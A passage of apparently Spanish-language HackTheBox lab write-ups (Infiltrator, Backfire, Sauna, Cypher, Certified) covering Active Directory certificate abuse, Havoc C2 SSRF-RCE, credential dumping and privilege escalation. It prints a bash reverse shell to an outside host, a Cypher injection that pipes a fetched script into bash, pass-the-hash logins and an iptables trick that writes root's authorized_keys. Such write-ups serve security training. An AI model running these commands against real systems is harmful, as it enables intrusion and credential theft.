user_accounts;` ![Image](image-116.png) ```r lan_managment l@n_M@an!1331 ``` ![Image](image-117.png) ![Image](image-118.png) ## Auth as Infiltrator_svc ![Image](image-119.png) Hay 2 maneras para leer el GMSA password - gMSADumper ```zsh python3 gMSADumper.py -u lan_managment -p 'l@n_M@an!1331' -d infiltrator.htb ``` - NetExec ```zsh nxc ldap infiltrator.htb -u lan_managment -p 'l@n_M@an!1331' --gmsa ``` ![Image](image-120.png) ```r infiltrator_svc$ 653b2726881d6e5e9ae3690950f9bcc4 ``` ```zsh nxc smb infiltrator.htb -u 'infiltrator_svc$' -H '653b2726881d6e5e9ae3690950f9bcc4' ``` ![Image](image-121.png) No funciona sobre winRM ![Image](image-122.png) ## Shell as Administrator ### ADCS Enumeration ```zsh nxc ldap infiltrator.htb -u 'infiltrator_svc$' -H '653b2726881d6e5e9ae3690950f9bcc4' -M adcs ``` [Certipy](https://github.com/ly4k/Certipy) usará estas credenciales para buscar configuraciones vulnerables: ```zsh certipy-ad find -vulnerable -dc-ip 10.10.11.31 -u 'infiltrator_svc$' -hashes ':653b2726881d6e5e9ae3690950f9bcc4' -stdout ``` ![Image](image-123.png) ### ESC 4 Exploit ```zsh certipy-ad template -u 'infiltrator_svc$' -hashes ':653b2726881d6e5e9ae3690950f9bcc4' -dc-ip 10.10.11.31 -template Infiltrator_Template -write-default-configuration ``` ![Image](image-124.png) ![Image](image-125.png) Si vuelvo a ejecutar el comando anterior, podemos ver que ahora es muy vulnerable. ![Image](image-126.png) Necesitamos ejecutar ambos comandos (plantilla y req) para obtener .pfx ```zsh certipy-ad req -u 'infiltrator_svc$' -dc-ip 10.10.11.31 -target-ip 10.10.11.31 -hashes ':653b2726881d6e5e9ae3690950f9bcc4' -template Infiltrator_Template -upn administrator@infiltrator.htb -ca 'infiltrator-DC01-CA' ``` - Para explotar ESC1, hago un request al certificado para el administrador ![Image](image-127.png) El subcomando ``auth`` toma ese archivo ``.pfx`` y devuelve un TGT y el hash NTLM ```zsh certipy-ad auth -pfx administrator.pfx -dc-ip 10.10.11.31 ``` ![Image](image-128.png) > certipy-ad template -u 'infiltrator_svc$' -hashes ':653b2726881d6e5e9ae3690950f9bcc4' -dc-ip 10.10.11.31 -template Infiltrator_Template -write-configuration Infiltrator_Template.json > Con esto volvemos a poner el template original en infiltrator (Con el find de ser detectados o ser mas sigilosos) ### Validate Creds ```zsh nxc smb infiltrator.htb -u administrator -H aad3b435b51404eeaad3b435b51404ee:1356f502d2764368302ff0369b1121a1 ``` ![Image](image-129.png) ```zsh evil-winrm -i 10.10.11.31 -u 'administrator' -H '1356f502d2764368302ff0369b1121a1' ``` ![Image](image-130.png)"},{"id":"backfire","title":"HTB - BackFire","description":"HTB - BackFire","date":"2025-06-08T00:00:00.000Z","tags":["HackTheBox","Medium","Havoc","C2","CVE-2024-4157","SSRF","Iptables","Pivoting","Port-Forwarding","RCE","CC","ssh"],"authors":["r4cc0x"],"url":"/blog/backfire","content":"## Box Info | Name | Backfire | | :-------------------- | ---------------: | | Release Date | 18 Jan, 2025 | | OS | Linux | | Rated Difficulty | Medium | ## Enumeration ```zsh PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 9.2p1 Debian 2+deb12u4 (protocol 2.0) | ssh-hostkey: | 256 7d:6b:ba:b6:25:48:77:ac:3a:a2:ef:ae:f5:1d:98:c4 (ECDSA) |_ 256 be:f3:27:9e:c6:d6:29:27:7b:98:18:91:4e:97:25:99 (ED25519) 443/tcp open ssl/http nginx 1.22.1 | ssl-cert: Subject: commonName=127.0.0.1/organizationName=test llc/stateOrProvinceName=Florida/countryName=US | Subject Alternative Name: IP Address:127.0.0.1 | Not valid before: 2024-06-14T15:01:25 |_Not valid after: 2027-06-14T15:01:25 |_http-server-header: nginx/1.22.1 |_http-title: 404 Not Found | tls-alpn: | http/1.1 | http/1.0 |_ http/0.9 |_ssl-date: TLS randomness does not represent time 8000/tcp open http nginx 1.22.1 |_http-open-proxy: Proxy might be redirecting requests |_http-title: Index of / | http-ls: Volume / | SIZE TIME FILENAME | 1559 17-Dec-2024 12:31 disable_tls.patch | 875 17-Dec-2024 12:34 havoc.yaotl |_ |_http-server-header: nginx/1.22.1 Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel ``` http://10.10.11.49:8000 Nginx muestra un listado de directorios de archivos ![Image](image.png) ```zsh curl 10.10.11.49:8000/havoc.yaotl ``` ## Havoc C2 Server ``` Teamserver { Host = \"127.0.0.1\" Port = 40056 Build { Compiler64 = \"data/x86_64-w64-mingw32-cross/bin/x86_64-w64-mingw32-gcc\" Compiler86 = \"data/i686-w64-mingw32-cross/bin/i686-w64-mingw32-gcc\" Nasm = \"/usr/bin/nasm\" } } Operators { user \"ilya\" { Password = \"CobaltStr1keSuckz!\" } user \"sergej\" { Password = \"1w4nt2sw1tch2h4rdh4tc2\" } } Demon { Sleep = 2 Jitter = 15 TrustXForwardedFor = false Injection { Spawn64 = \"C:\\\\Windows\\\\System32\\\\notepad.exe\" Spawn32 = \"C:\\\\Windows\\\\SysWOW64\\\\notepad.exe\" } } Listeners { Http { Name = \"Demon Listener\" Hosts = [ \"backfire.htb\" ] HostBind = \"127.0.0.1\" PortBind = 8443 PortConn = 8443 HostRotation = \"round-robin\" Secure = true } } ``` ![Image](image-1.png) **Havoc Framework** es un marco avanzado de post-explotación y Comando & Control (C2) diseñado para equipos rojos y pruebas de penetración. Sirve como alternativa a otros marcos C2 conocidos como **Cobalt Strike, Sliver, and Mythic**. #### disable_tls.patch Desactivar TLS para el puerto de administración de WebSocket 40056 para poder demostrar que sergej no realiza ningún trabajo. El puerto de administración solo permite conexiones locales (usamos reenvío SSH), por lo que esto no comprometerá nuestro servidor de Teams. ``` diff --git a/client/src/Havoc/Connector.cc b/client/src/Havoc/Connector.cc index abdf1b5..6be76fb 100644 --- a/client/src/Havoc/Connector.cc +++ b/client/src/Havoc/Connector.cc @@ -8,12 +8,11 @@ Connector::Connector( Util::ConnectionInfo* ConnectionInfo ) { Teamserver = ConnectionInfo; Socket = new QWebSocket(); - auto Server = \"wss://\" + Teamserver->Host + \":\" + this->Teamserver->Port + \"/havoc/\"; + auto Server = \"ws://\" + Teamserver->Host + \":\" + this->Teamserver->Port + \"/havoc/\"; auto SslConf = Socket->sslConfiguration(); /* ignore annoying SSL errors */ SslConf.setPeerVerifyMode( QSslSocket::VerifyNone ); - Socket->setSslConfiguration( SslConf ); Socket->ignoreSslErrors(); QObject::connect( Socket, &QWebSocket::binaryMessageReceived, this, [&]( const QByteArray& Message ) diff --git a/teamserver/cmd/server/teamserver.go b/teamserver/cmd/server/teamserver.go index 9d1c21f..59d350d 100644 --- a/teamserver/cmd/server/teamserver.go +++ b/teamserver/cmd/server/teamserver.go @@ -151,7 +151,7 @@ func (t *Teamserver) Start() { } // start the teamserver - if err = t.Server.Engine.RunTLS(Host+\":\"+Port, certPath, keyPath); err != nil { + if err = t.Server.Engine.Run(Host+\":\"+Port); err != nil { logger.Error(\"Failed to start websocket: \" + err.Error()) ``` En este archivo podemos ver 2 cambios: uno elimina wss:// (WebSocketSecure) y lo cambia a ws:// (WebSocketNoSecure). Estos cambios afectan a la URL de conexión al TeamServer. ![Image](image-2.png) El segundo cambio es el anterior: eliminar RunTLS y cambiarlo a solo Run, eliminando el certificado SSL. ![Image](image-3.png) TeamServer: ```r Host: 127.0.0.1 Port: 40056 ``` >El servidor Havoc C2 está en el puerto 40056 en localhost, internamente, lo que significa que no podemos interactuar con él desde afuera. - Credenciales que obtuvimos del archivo havoc.yaotl: ``` ilya CobaltStr1keSuckz! sergej 1w4nt2sw1tch2h4rdh4tc2 ``` ```zsh echo \"10.10.11.49 backfire.htb\" | sudo tee -a /etc/hosts ``` Web on Port 80 - `https://backfire.htb` ![Image](image-4.png) >Podemos interceptar la solicitud con Burp Suite y ver en la respuesta un encabezado llamado \"X-Havoc: True\" que confirma que los servidores están usando un marco Havoc C2 para facilitar la comunicación entre el C2 con TeamServer. ## SSRF-RCE (CVE-2024-4157) >Objective: `WebSocket - 40056` Esta vulnerabilidad implica un spoofing daemon agent y el registro de un agente falso; la vulnerabilidad también puede realizar check-ins y abrir sockets TCP en el TeamServer para el socket establecido, lo que permite la interacción con el servidor y obtiene RCE. [Havoc-C2-SSRF-RCE-Exploit](https://github.com/0xsyr0/Havoc-C2-SSRF-RCE-Exploit) ```zsh python3 exploit.py -t https://backfire.htb -i 127.0.0.1 --internal-port 40056 --payload-url http://10.10.14.9/payload --username ilya --password CobaltStr1keSuckz! ``` ![Image](image-6.png) ![Image](image-7.png) [Havoc-C2-RCE-2024](https://github.com/Nicolas-Arsenault/Havoc-C2-RCE-2024/tree/main) ```zsh python3 poc.py -t https://backfire.htb -i 127.0.0.1 -p 40056 ``` Configuramos el usuario, la contraseña y la inyección de comandos para la reverse shell ![Image](image-8.png) ![Image](image-9.png) ## SSH Connection | ilya ![Image](image-10.png) Authorized SSH ```zsh ssh-keygen -t ed25519 -C \"testt@kali\" ``` ![Image](image-11.png) Add to Authorized_keys ![Image](image-12.png) ```zsh echo 'ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIMS0W1ssSRxAyYzPwhMN8Ay0kebsej/jamGwRq+CZamY testt@kali' >> authorized_keys ``` ```zsh ssh -i mi ilya@10.10.1149 ``` ![Image](image-13.png) ## HardHat C2 | Sergej ![Image](image-14.png) ![Image](image-15.png) [C2 - HardHatC2](https://github.com/gmh5225/C2-HardHatC2) ### Port Forwarding ```zsh ssh -L 7096:localhost:7096 ilya@backfire.htb -i mi ``` ```zsh ssh -L 5000:localhost:5000 ilya@backfire.htb -i mi ``` ### Port 7096 | HardHat C2 `https://127.0.0.1:7096` ![Image](image-16.png) Intercept with BurpSuite ![Image](image-17.png) Deserialize ![Image](image-18.png) ![Image](image-19.png) Sin embargo no hay nada importante. ### Port 5000 | HardHat C2 ```zsh curl -k https://127.0.0.1:5000/ -v ``` ![Image](image-20.png) ## HardHat C2 | Authentication Bypass [HardHatC2-0-Days(RCE & AuthN Bypass)](https://blog.sth.sh/hardhatc2-0-days-rce-authn-bypass-96ba683d9dd7) ![Image](image-21.png) ``` sth_pentest sth_pentest ``` Sign In ![Image](image-22.png) ## HardHat C2 | RCE Implant Interact > Terminal ![Image](image-23.png) Si ejecutamos `whoami` el output nos dice que somos sergej. ![Image](image-24.png) Una vez que enviamos una reverse shell, podemos agregar nuevamente nuestra clave RSA para Sergej e iniciar sesión con SSH como lo hicimos anteriormente. ![Image](image-25.png) We can add our rsa key again for sergej and login with ssh ## Privilege Escalation `sudo -l` ![Image](image-26.png) Este enfoque de vulnerabilidad lee el archivo id_ed25519.pub e inyecta reglas de iptables como comentario. ```zsh sudo /usr/sbin/iptables -A INPUT -i lo -j ACCEPT -m comment --comment \"$(printf '\\n%s\\n' \"$(cat /home/sergej/.ssh/id_ed25519.pub)\"; echo '\\n')\" ``` Muestra las reglas de firewall configuradas como formato de comando. ```zsh sudo /usr/sbin/iptables -S ``` ![Image](image-27.png) Con iptables-save exportamos las reglas del firewall (con la clave rsa maliciosa) a root. ```zsh sudo iptables-save -f /root/.ssh/authorized_keys ``` Una vez agregada nuestra clave RSA, podemos usar SSH para iniciar sesión como root. ```zsh ssh -i ~/.ssh/id_ed25519 root@localhost ``` ![Image](image-28.png) Rooted - 8/06/25"},{"id":"sauna","title":"HTB - Sauna","description":"HTB - Sauna","date":"2025-06-08T00:00:00.000Z","tags":["HackTheBox"],"authors":["r4cc0x"],"url":"/blog/sauna","content":"## Box Info | Name | Sauna | | :-------------------- | ---------------: | | Release Date | 15 Feb, 2020 | | OS | Windows | | Rated Difficulty | Easy | ```zsh ping -c 3 10.10.10.175 PING 10.10.10.175 (10.10.10.175) 56(84) bytes of data. 64 bytes from 10.10.10.175: icmp_seq=1 ttl=127 time=179 ms 64 bytes from 10.10.10.175: icmp_seq=2 ttl=127 time=179 ms 64 bytes from 10.10.10.175: icmp_seq=3 ttl=127 time=180 ms Maquina Windows ``` ## Recon ```zsh # Nmap 7.95 scan initiated Thu Jun 26 14:04:00 2025 as: /usr/lib/nmap/nmap --privileged -sCV -p 53,80,88,135,139,389,445,464,593,636,3268,3269,5985,9389,49667,49673,49674,49676,49698,49718 -oN targeted 10.10.10.175 Nmap scan report for 10.10.10.175 Host is up (0.22s latency). PORT STATE SERVICE VERSION 53/tcp open domain Simple DNS Plus 80/tcp open http Microsoft IIS httpd 10.0 |_http-title: Egotistical Bank :: Home |_http-server-header: Microsoft-IIS/10.0 | http-methods: |_ Potentially risky methods: TRACE 88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2025-06-27 03:04:09Z) 135/tcp open msrpc Microsoft Windows RPC 139/tcp open netbios-ssn Microsoft Windows netbios-ssn 389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: EGOTISTICAL-BANK.LOCAL0., Site: Default-First-Site-Name) 445/tcp open microsoft-ds? 464/tcp open kpasswd5? 593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0 636/tcp open tcpwrapped 3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: EGOTISTICAL-BANK.LOCAL0., Site: Default-First-Site-Name) 3269/tcp open tcpwrapped 5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP) |_http-server-header: Microsoft-HTTPAPI/2.0 |_http-title: Not Found 9389/tcp open mc-nmf .NET Message Framing 49667/tcp open msrpc Microsoft Windows RPC 49673/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0 49674/tcp open msrpc Microsoft Windows RPC 49676/tcp open msrpc Microsoft Windows RPC 49698/tcp open msrpc Microsoft Windows RPC 49718/tcp open msrpc Microsoft Windows RPC Service Info: Host: SAUNA; OS: Windows; CPE: cpe:/o:microsoft:windows Host script results: |_clock-skew: 7h00m01s | smb2-time: | date: 2025-06-27T03:05:02 |_ start_date: N/A | smb2-security-mode: | 3:1:1: |_ Message signing enabled and required ``` `Domain: EGOTISTICAL-BANK.LOCAL` ### Web - 80 ![Image](image-2.png) - Team ![Image](image-1.png) ### Kerbrute Usamos ``Kerbrute`` para enumerar nombres de usuario válidos frente a Kerberos. ```zsh ./kerbrute userenum -d EGOTISTICAL-BANK.LOCAL usernames.txt --dc EGOTISTICAL-BANK.LOCAL ``` ![Image](image-3.png) `fsmith@EGOTISTICAL-BANK.LOCAL` ## KRB_AS_REP Roasting Identificar usuarios sin autenticación previa de Kerberos (`UF_DONT_REQUIRE_PREAUTH`). Esto permite solicitar una **TGT (Ticket Granting Ticket)** sin proporcionar credenciales primero. ```zsh /usr/share/doc/python3-impacket/examples/GetNPUsers.py EGOTISTICAL-BANK.LOCAL/fsmith -no-pass ``` ![Image](image-4.png) ## John Save tgt to file and crack it with john ```zsh john hash -w=/usr/share/wordlists/rockyou.txt ``` ![Image](image-5.png) ```zsh Thestrokes23 ``` ## SMB Enum ```zsh nxc smb EGOTISTICAL-BANK.LOCAL -u fsmith -p \"Thestrokes23\" --shares ``` ![Image](image-6.png) ![Image](image-7.png) ### RPC - 135 ```zsh rpcclient -U 'fsmith%Thestrokes23' 10.10.10.175 -c 'enumdomusers' | grep -oP '\\[.*?\\]' | grep -v \"0x\" | tr -d '[]' ``` ```r HSmith FSmith svc_loanmgr ``` ```zsh nxc winrm EGOTISTICAL-BANK.LOCAL -u fsmith -p \"Thestrokes23\" ``` ![Image](image-8.png) ## WinPEAS - Upload winpeas to enumerate possible privilege escalation ![Image](image-10.png) ``` svc_loanmanager Moneymakestheworldgoround! ``` ### Verify Creds ```zsh nxc smb EGOTISTICAL-BANK.LOCAL -u 'svc_loanmgr' -p 'Moneymakestheworldgoround!' ``` ![Image](image-9.png) ```zsh nxc winrm EGOTISTICAL-BANK.LOCAL -u \"svc_loanmgr\" -p 'Moneymakestheworldgoround!' ``` ![Image](image-11.png) Con el usuario svc_loanmgr podemos dumpear los hashes desde el archivo NTDS.dit y este archivo tiene todos los usuarios del AD incluyendo al administrator, pero para poder dumpearlo necesitamos saber si el usuario svc_loanmgr es parte del grupo Domain Admins, Enterprise Admins o tener acceso de backup\\restore. De lo contrario no podra dumpear el ntds.dit directamente. ```zsh bloodhound-python -d EGOTISTICAL-BANK.LOCAL -u svc_loanmgr -p 'Moneymakestheworldgoround!' -ns 10.10.10.175 --zip -c All ``` ![Image](image-13.png) Impacket-secretsdump es un script que permite extraer hashes mediante tickets Kerberos. Resulta especialmente útil para la extracción de credenciales cuando se tiene acceso a un controlador de dominio de Windows. ```zsh /usr/bin/impacket-secretsdump egotistical-bank.local/svc_loanmgr:'Moneymakestheworldgoround!'@sauna.htb ``` ![Image](image-14.png) ```zsh evil-winrm -i 10.10.10.175 -u \"administrator\" -H '823452073d75b9d1cf70ebdf86c7f98e' ``` ![Image](image-15.png)"},{"id":"cypher","title":"HTB - Cypher","description":"Cypher","date":"2025-04-15T00:00:00.000Z","tags":["BBOT","SQLi","Code-Analysis","Infomration-Disclosure","FootPrinting"],"authors":["r4cc0x"],"url":"/blog/cypher","content":"Enumeration Nmap ```zsh Host is up (0.059s latency). PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 9.6p1 Ubuntu 3ubuntu13.8 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 256 be:68:db:82:8e:63:32:45:54:46:b7:08:7b:3b:52:b0 (ECDSA) |_ 256 e5:5b:34:f5:54:43:93:f8:7e:b6:69:4c:ac:d6:3d:23 (ED25519) 80/tcp open http nginx 1.24.0 (Ubuntu) |_http-title: Did not follow redirect to http://cypher.htb/ |_http-server-header: nginx/1.24.0 (Ubuntu) Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel ``` ```zsh echo \"10.10.11.57 cypher.htb\" | sudo tee -a /etc/hosts ``` ``` whatweb http://cypher.htb/ ``` ![image](image.png) Login panel ![image](image-1.png) ```zsh feroxbuster -u http://cypher.htb/ ``` ![image](image-2.png) ```zsh gobuster dir -u http://cypher.htb/ -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt ``` ![image](image-3.png) ```zsh gobuster dir -u http://cypher.htb/ -w /usr/share/seclists/Discovery/Web-Content/common.txt -x php,html,txt ``` ![image](image-4.png) Open the file .jar on /testing path ![image](image-5.png) Identify the system is running neo4j ![image](image-6.png) neo4j 5.23.0 Intentamos un simple injeccion de SQL ```sql ' or 1=1-- - ``` ![image](image-7.png) we open again and looking a depth ![image](image-8.png) I supported with deepseek AI. ### **Code Analysis: `custom.getUrlStatusCode` in Neo4j (APOC)** This Java code defines a **custom Neo4j procedure** called `custom.getUrlStatusCode` that fetches the HTTP status code of a given URL using `curl` ![image](image-9.png) _Use java decompiler https://java-decompiler.github.io/ for open custom-apoc-extension-1.0-SNAPSHOT.jar_ ```zsh echo \"/bin/bash -i >& /dev/tcp/10.10.15.14/4444 0>&1\" > shell.sh ``` `python3 -m http.server 80` ```zsh rlwrap nc -lvnp 4444 ``` ## Injeccion Cypher ```ruby {\"username\":\"admin' return h.value as a UNION CALL custom.getUrlStatusCode(\\\"cypher.htb; curl 10.10.15.14/shell.sh | bash;#\\\") YIELD statusCode AS a RETURN a;//\",\"password\":\"admin\"} ``` `UNION CALL` calls a storage proccess call `custom.getUrlStatusCode` with arguments for run malicious shell ``\"cypher.htb; curl 10.10.15.14/shell.sh | bash;#\"`` and `YIELD statusCode AS a RETURN a` for return to proccess results ![image](image-10.png) --- > Also cypher supports querying with parameters >`http://cypher.htb/api/cypher ?query=CALL%20custom.getUrlStatusCode(%22cypher.htb;%20id%22)` ![image](image-11.png) --- ## neo4j Obtained a shell no interactive ![image](image-12.png) ![image](image-13.png) ``` neo4j cU4btyib.20xtCMCXkBmerhK ``` re-use pasword for graphasm ![image](image-14.png) `sudo -l` ![image](image-15.png) BBOT v2.1.0 ![image](image-16.png) Privelege Escalation ```zsh sudo /usr/local/bin/bbot -t /root/root.txt -o /tmp/bandera_out -d ``` ![image](image-17.png) the flag appears as `DNS query with args=` ![image](image-18.png) or looking in output.txt ![image](image-19.png)"},{"id":"certified","title":"HTB - Certified","description":"HTB - Certified","date":"2025-03-19T00:00:00.000Z","tags":["HackTheBox","Medium","DACL","ACL","ADCS","Certipy","Bloodhound"],"authors":["r4cc0x"],"url":"/blog/certified","content":"## Box Info | Name | Certified | | :-------------------- | ---------------: | | Release Date | 02 Nov, 2024 | | OS | Windows | | Rated Difficulty | Medium | ## Recon Maquina Windows ![Image](image.png) Iniciamos con credenciales que nos provee hack the box. Username: judith.mader Password: judith09 ```java # Nmap 7.95 scan initiated Tue Mar 18 15:52:19 2025 as: /usr/lib/nmap/nmap -p 53,88,135,139,389,445,464,593,636,3268,3269,5985,9389,49666,49668,49673,49674,49683,49713,49737,63553 -sCV -oN targeted 10.10.11.41 Nmap scan report for 10.10.11.41 Host is up (0.071s latency). PORT STATE SERVICE VERSION 53/tcp open domain Simple DNS Plus 88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2025-03-19 02:52:27Z) 135/tcp open msrpc Microsoft Windows RPC 139/tcp open netbios-ssn Microsoft Windows netbios-ssn 389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: certified.htb0., Site: Default-First-Site-Name) |_ssl-date: 2025-03-19T02:53:58+00:00; +7h00m00s from scanner time. | ssl-cert: Subject: commonName=DC01.certified.htb | Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1: , DNS:DC01.certified.htb | Not valid before: 2024-05-13T15:49:36 |_Not valid after: 2025-05-13T15:49:36 445/tcp open microsoft-ds? 464/tcp open kpasswd5? 593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0 636/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: certified.htb0., Site: Default-First-Site-Name) |_ssl-date: 2025-03-19T02:53:57+00:00; +7h00m01s from scanner time. | ssl-cert: Subject: commonName=DC01.certified.htb | Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1: , DNS:DC01.certified.htb | Not valid before: 2024-05-13T15:49:36 |_Not valid after: 2025-05-13T15:49:36 3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: certified.htb0., Site: Default-First-Site-Name) |_ssl-date: 2025-03-19T02:53:58+00:00; +7h00m00s from scanner time. | ssl-cert: Subject: commonName=DC01.certified.htb | Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1: , DNS:DC01.certified.htb | Not valid before: 2024-05-13T15:49:36 |_Not valid after: 2025-05-13T15:49:36 3269/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: certified.htb0., Site: Default-First-Site-Name) |_ssl-date: 2025-03-19T02:53:57+00:00; +7h00m01s from scanner time. | ssl-cert: Subject: commonName=DC01.certified.htb | Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1: , DNS:DC01.certified.htb | Not valid before: 2024-05-13T15:49:36 |_Not valid after: 2025-05-13T15:49:36 5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP) |_http-server-header: Microsoft-HTTPAPI/2.0 |_http-title: Not Found 9389/tcp open mc-nmf .NET Message Framing 49666/tcp open msrpc Microsoft Windows RPC 49668/tcp open msrpc Microsoft Windows RPC 49673/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0 49674/tcp open msrpc Microsoft Windows RPC 49683/tcp open msrpc Microsoft Windows RPC 49713/tcp open msrpc Microsoft Windows RPC 49737/tcp open msrpc Microsoft Windows RPC 63553/tcp open msrpc Microsoft Windows RPC Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows Host script results: |_clock-skew: mean: 7h00m00s, deviation: 0s, median: 7h00m00s | smb2-time: | date: 2025-03-19T02:53:18 |_ start_date: N/A | smb2-security-mode: | 3:1:1: |_ Message signing enabled and required ``` ![Image](image-1.png) Con smb podemos obtener mas informacion sobre el dominio, windows, version, arquitectura y nombre del domino. ```zsh netexec smb 10.10.11.41 ``` ```zsh SMB 10.10.11.41 445 DC01 [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:certified.htb) (signing:True) (SMBv1:False) ``` Agregamos los nombres del dominio a nuestro archivo hosts ```bash echo \"10.10.11.41 DC01 certified.htb DC01.certified.htb\" | sudo tee -a /etc/hosts ``` ```bash netexec smb DC01 --shares SMB 10.10.11.41 445 DC01 [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:certified.htb) (signing:True) (SMBv1:False) SMB 10.10.11.41 445 DC01 [-] IndexError: list index out of range SMB 10.10.11.41 445 DC01 [-] Error enumerating shares: STATUS_USER_SESSION_DELETED ``` Otra opcion es: `netexec smb DC01 -u 'guest' --shares` pero respondera con lo mismo asi que pasamos las credenciales para validarlas. ```bash netexec smb DC01 -u 'judith.mader' -p 'judith09' --shares ``` ![Image](image-2.png) ```bash smbmap -u 'judith.mader' -p 'judith09' -H 10.10.11.41 -r SYSVOL --depth 10 ``` _Listing all files from directorie SYSVOL_ ![Image](image-3.png) No encontramos nada interesante. - Users Enumeration Con rpclcient podemos enumerar los usuarios de un dominio e incluso con parametros como `querydispinfo` para que nos muestra informacion como la descripcion de cada usuario. `rpcclient -U \"judith.mader%judith09\" 10.10.11.41 -c 'enumdomusers` ```zsh rpcclient -U \"judith.mader%judith09\" 10.10.11.41 -c 'enumdomusers' | grep -oP '\\[.*?\\]' | grep -v \"0x\" | tr -d '[]' | tail -n 6 > users ``` ![[Pasted image 20250318143107.png]] ```bash #Administrator #Guest #krbtgt judith.mader management_svc ca_operator alexander.huges harry.wilson gregory.cameron ``` ## ASREPRoasting Attack (Ticket Granting Ticket) Con el ataque de ASREP Roast podemos identificar usuarios sin el kerberos pre-authentication (`UF_DONT_REQUIRE_PREAUTH`). Esto nos permite obtener un TGT (Ticket Granting Ticket) sin proveer credenciales. Desafortunadamente pasa lo contrario tienen habilitado el \"DONT REQUIRE PREAUTH\". ```bash python3 GetNPUsers.py -no-pass -usersfile users certified.htb/ ``` ![Image](image-4.png) ## Kerberoast (Ticket Granting Service) ```zsh python3 GetUserSPNs.py certified.htb/judith.mader:judith09 ``` ![Image](image-5.png) ```zsh python3 GetUserSPNs.py certified.htb/judith.mader:judith09 -request ``` ![Image](image-6.png) Esto *Clock skew too great* sucede porque el dominio tiene una hora diferente al nuestro, incluso al enumerar los puertos al final aparece algo como esto `|_clock-skew: mean: 7h00m00s, deviation: 0s, median: 7h00m00s` que hay que sincronizarnos la hora con el dominio para poder ejecutar algunas herramientas. `sudo ntpdate 10.10.11.41` ![Image](image-7.png) Este hash no se puede crackear. Como anteriormente mencione, con algunas opciones en rpcclient puedes obtener mas informacion. ```zsh rpcclient -U \"judith.mader%judith09\" 10.10.11.41 -c 'querydispinfo' ``` Con querydispinfo no encontramos nada. Con `enumdomgroups` listamos grupos del dominio. ```zsh rpcclient -U \"judith.mader%judith09\" 10.10.11.41 -c 'enumdomgroups' ``` ```zsh [Enterprise Read-only Domain Controllers] [Domain Admins] [Domain Users] [Domain Guests] [Domain Computers] [Domain Controllers] [Schema Admins] [Enterprise Admins] [Group Policy Creator Owners] [Read-only Domain Controllers] [Cloneable Domain Controllers] [Protected Users] [Key Admins] [Enterprise Key Admins] [DnsUpdateProxy] [Management] ``` En active Directory los `RID` y los `SID` son componentes que identifican de forma unica a usuarios, grupos y otros objetos dentro de un dominio de Active Directory. El `SID` es un identificador unico asignado a cada objeto de seguridad en un dominio de AD. El `RID` es la parte del SID que identifica de forma unica un objeto dentro de un dominio. En este caso tu puedes ver el RID del objeto grupo [Domain Admins]. ![Image](image-8.png) ```zsh rpcclient -U \"judith.mader%judith09\" 10.10.11.41 -c 'querygroupmem 0x200' ``` Aqui aparece este unico RID que probablemente sea el de administrador. ![Image](image-9.png) ```zsh rpcclient -U \"judith.mader%judith09\" 10.10.11.41 -c 'queryuser 0x1f4' ``` ![Image](image-10.png) ![Image](image-11.png) ```zsh rpcclient -U \"judith.mader%judith09\" 10.10.11.41 -c 'querygroupmem 0x450' rid:[0x451] attr:[0x7] ``` Aqui podemos ver otro usuario `rpcclient -U \"judith.mader%judith09\" 10.10.11.41 -c 'queryuser 0x451'` ![Image](image-12.png) De igual forma, con mayor comodidad con ``ldapdomaindump`` podemos extraer todos los usuarios,grupos del AD. ```zsh ldapdomaindump -u 'certified.htb\\judith.mader' -p judith09 -n 10.10.11.41 DC01 ``` ![Image](image-13.png) open .html with python3 ![Image](image-14.png) El grupo que nos intereas es ``Remote Management Users`` en el cual el unico usuario que encuentra es ``management_svc`` por lo que sera nuestro objetivo. ![Image](image-15.png) ## BloodHound ```zsh bloodhound-python -d certified.htb -u judith.mader -p judith09 -ns 10.10.11.41 --zip -c All ``` ``curl -L https://ghst.ly/getbhce > ./docker-compose.yml`` ``sudo docker compose pull && docker compose up`` `Upload .zip and wait 10 seconds and search judith.mader` ![Image](image-16.png) Judith.mader puede agregarse a si misma al grupo ManagementGroup mediante el WirteOwner ![Image](image-17.png) ### Modief AD Object | WriterOwner ![Image](image-18.png) ```zsh python3 owneredit.py -action write -new-owner 'judith.mader' -target 'management' 'certified.htb/judith.mader:judith09' ``` ![Image](image-20.png) ```zsh python3 dacledit.py -action 'write' -rights 'WriteMembers' -principal 'judith.mader' -target-dn 'CN=MANAGEMENT,CN=USERS,DC=CERTIFIED,DC=HTB' 'certified.htb/judith.mader':'judith09' ``` ![Image](image-21.png) ```zsh net rpc group addmem \"Management\" \"judith.mader\" -U \"certified.htb/judith.mader%judith09\" -S \"10.10.11.41\" ``` Ahora confirmaremos si realmente se agrego judith.mader al grupo Management con rpcclient _Identifier if user judith is now in group management_ ```zsh rpcclient -U \"judith.mader%judith09\" 10.10.11.41 -c 'querygroupmem 0x450' ``` ![Image](image-22.png) ![Image](image-23.png) La otra forma de listar si se agregó judith al grupo de Management con `net rpc` ```zsh net rpc 